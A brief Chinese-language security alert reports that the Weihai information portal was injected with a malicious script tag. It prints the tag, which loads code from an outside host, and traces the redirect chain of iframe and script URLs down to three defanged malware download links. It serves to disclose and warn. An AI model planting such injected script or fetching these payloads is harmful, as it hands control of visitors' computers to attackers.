威海信息港被植入恶意代码
威海信息港(http://www.whinfo.net.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://shop.whinfo.net.cn/user/detail.asp?id=4643&bookid=2921
网页被嵌入恶意链接代码:
<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://shop.whinfo.net.cn/user/detail.asp?id=4643&bookid=2921
[script]http://3b3.org/c.js
[frame]http://8geg655.8866.org/a/a100.htm
[frame]http://8geg655.8866.org/a/163.htm
[frame]http://8geg655.8866.org/a/ggqm.htm
[script]http://8geg655.8866.org/a/js.js
[frame]http://8geg655.8866.org/a/gg14.htm
[frame]http://8geg655.8866.org/a/ggfl.htm
[frame]http://8geg655.8866.org/a/ggff.htm
[frame]http://8geg655.8866.org/a/ggvod.htm
[frame]http://8geg655.8866.org/a/e.htm
[frame]http://8geg655.8866.org/a/ggbb.htm
[frame]http://8geg655.8866.org/a/ggr.htm
[frame]http://8geg655.8866.org/a/p.htm
[script]http://js.tongji.cn.yahoo.com/1083501/ystat.js
[script]http://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
[frame]http://8geg655.8866.org/a/a100.htm
[script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
hxxp://5l2o8.com/web/3.exe
hxxp://yes9821.3322.org/web/activex.exe
hxxp://exe316.com/web/xp.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
关键字:威海信息港
